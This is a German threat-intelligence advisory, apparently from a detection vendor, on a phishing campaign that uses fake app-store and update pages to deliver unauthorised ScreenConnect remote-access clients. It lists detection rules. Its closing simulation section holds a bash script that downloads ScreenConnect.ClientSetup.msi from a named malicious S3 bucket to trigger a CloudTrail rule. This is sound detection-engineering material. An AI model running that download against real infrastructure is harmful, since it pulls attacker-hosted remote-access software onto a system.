SOC Prime Bias: Hoch

11 Aug 2026 06:17 UTC

ScreenConnect-Verbreitung im großen Maßstab durch Phishing im App-Store-Stil

Author Photo
SOC Prime Team linkedin icon Folgen
ScreenConnect-Verbreitung im großen Maßstab durch Phishing im App-Store-Stil
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Eine groß angelegte Phishing-Kampagne nutzt fortschrittliche Techniken des Social Engineerings, um unautorisierte ConnectWise ScreenConnect-Clients bereitzustellen. Angreifer geben sich als vertrauenswürdige Dienste wie den Microsoft Store, den Apple App Store und Google Meet aus, indem sie dynamische Webinhalte und betrügerische Update-Aufforderungen verwenden. Sobald installiert, ermöglicht die RMM-Software den Angreifern einen dauerhaften Fernzugriff auf kompromittierte Systeme.

Untersuchung

Das LevelBlue OpsCTI-Team deckte die Kampagne durch Analyse eines gefälschten Update-Phishing-Frameworks und wiederverwendete Infrastruktur auf. Forscher identifizierten konsistente Verzeichnisstrukturen, wiederkehrende HTTP-Ressourcen-Hashes und KI-unterstützte Skripte, die verwendet wurden, um potenzielle Opfer zu profilieren. Die Untersuchung offenbarte auch den Missbrauch von Telegram-Bot-APIs für Telemetrie in Echtzeit und Infektionsberichte.

Minderung

Organisationen sollten die Erkennung unautorisierter RMM-Software priorisieren und ausführbare Downloads von unbekannten öffentlichen Cloud-Diensten wie Amazon S3 oder Cloudflare R2 überwachen. Kontrollen zur Identifizierung von Markenimitation und unautorisierten Telegram Bot API-Datenverkehr werden ebenfalls empfohlen. Regelmäßige Überprüfungen des Endgerätebestands können dazu beitragen, unerlaubte ScreenConnect-Installationen und bestehende Kompromittierungen aufzudecken.

Reaktion

Wenn ein Kompromittierungsverdacht besteht, sollten betroffene Systeme sofort isoliert werden, und ScreenConnect-Clients, die mit unautorisierten Relais-Instanzen kommunizieren, sollten untersucht werden. Netzwerkprotokolle sollten auf verdächtige Verbindungen zu bekannten Phishing-Domains oder öffentlichen Cloud-Speicher-Endpunkten überprüft werden. Responder sollten auch Prozesse untersuchen, die von msiexec.exe oder PowerShell gestartet wurden, die Dateien von externen Quellen herunterladen.

Angriffsablauf

Erkennungen

Die Möglichkeit der Ausführung durch versteckte PowerShell-Befehlszeilen (über cmdline)

SOC Prime Team
10. Aug. 2026

Rufe verdächtige .NET-Methoden aus PowerShell auf (über powershell)

SOC Prime Team
10. Aug. 2026

Mögliche Msiexec-Dateiausführung in ungewöhnlichem Verzeichnis (über cmdline)

SOC Prime Team
10. Aug. 2026

Alternative Fernzugriffs- / Management-Software (über process_creation)

SOC Prime Team
10. Aug. 2026

Möglicher Missbrauch von Cloudflare-Entwicklungsdomains (via dns)

SOC Prime Team
10. Aug. 2026

Verdächtige Command and Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)

SOC Prime Team
10. Aug. 2026

IOCs (HashSha256) zur Erkennung: Jenseits von ‚Fake Updates‘: Von Application Store-Themed Phishing zur großflächigen Verbreitung von ScreenConnect

SOC Prime AI Regeln
10. Aug. 2026

IOCs (SourceIP) zur Erkennung: Jenseits von ‚Fake Updates‘: Von Application Store-Themed Phishing zur großflächigen Verbreitung von ScreenConnect

SOC Prime AI Regeln
10. Aug. 2026

IOCs (DestinationIP) zur Erkennung: Jenseits von ‚Fake Updates‘: Von Application Store-Themed Phishing zur großflächigen Verbreitung von ScreenConnect

SOC Prime AI Regeln
10. Aug. 2026

Ausführung unautorisierter ScreenConnect-Installation via Phishing [Windows-Prozess-Erstellung]

SOC Prime AI Regeln
10. Aug. 2026

Erkennung des Downloads von ScreenConnect-Installern aus verdächtigen S3-Buckets [AWS Cloudtrail]

SOC Prime AI Regeln
10. Aug. 2026

Simulation der Ausführung

Voraussetzung: Die Telemetrie- und Basislinien-Vorflugkontrolle muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die durch die Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffs-Narrativ & Befehle: Ein Angreifer hat eine Phishing-Kampagne etabliert. Um der Erkennung durch dateibasierte Antivirus-Programme zu entgehen, hosten sie ein legitimes Fernzugriffstool (ScreenConnect) in einem öffentlichen AWS S3-Bucket, der legitimem Softwarevertrieb ähnelt. Der Angreifer weist ein Opfer an, den Installer herunterzuladen. Diese Aktion löst ein GetObject Ereignis in AWS CloudTrail aus, das den speziellen bösartigen Bucket anvisiert eobtdk.s3.us-east-2.amazonaws.com und den spezifischen Dateinamen ScreenConnect.ClientSetup.msi.

  • Regressionstestskript: [Note: Since we cannot interact with real malicious buckets, this script simulates the Anfrage die den Logeintrag erzeugen würde, wenn der Bucket existiert.]

    #!/bin/bash
    # Simulationsskript, um die CloudTrail-Erkennungsregel auszulösen
    # Dies imitiert den API-Aufruf, den ein Angreifer zum Herunterladen des Tools machen würde
    
    echo "[+] Starte Simulation: Herunterladen von ScreenConnect aus bösartigem S3..."
    
    # Wir verwenden die AWS-CLI, um einen GET-Anfrage zu versuchen. 
    # Auch wenn der Bucket nicht existiert, erzeugt der ‚Anfrage‘-Versuch das CloudTrail-Ereignis 
    # in einer realen Umgebung, in der der Bucket konfiguriert ist.
    
    aws s3 cp s3://eobtdk/ScreenConnect.ClientSetup.msi . --region us-east-2
    
    echo "[+] Simulationsbefehl gesendet. Überprüfen Sie CloudTrail auf GetObject-Ereignisse, die auf 'eobtdk.s3.us-east-2.amazonaws.com' abzielen."
  • Bereinigungskommandos:

    # Entfernen Sie alle während der Simulation heruntergeladenen Dateien
    rm -f ScreenConnect.ClientSetup.msi